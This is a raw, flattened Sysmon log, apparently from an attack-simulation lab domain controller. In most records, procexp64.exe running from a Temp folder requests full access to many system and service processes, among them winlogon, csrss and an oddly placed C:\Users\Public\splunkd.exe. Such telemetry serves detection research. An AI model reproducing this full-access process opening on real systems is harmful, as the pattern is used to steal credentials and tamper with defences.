15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790573Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790572Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790571Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790570Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790569Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790568Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790567Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790566Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790565Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790564Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790563Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790562Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790561Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790560Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790559Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790558Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790557Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790556Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790555Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790554Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790553Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790552Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790551Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790545Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790544Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790543Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790542Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790541Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790540Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790539Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790538Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790537Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 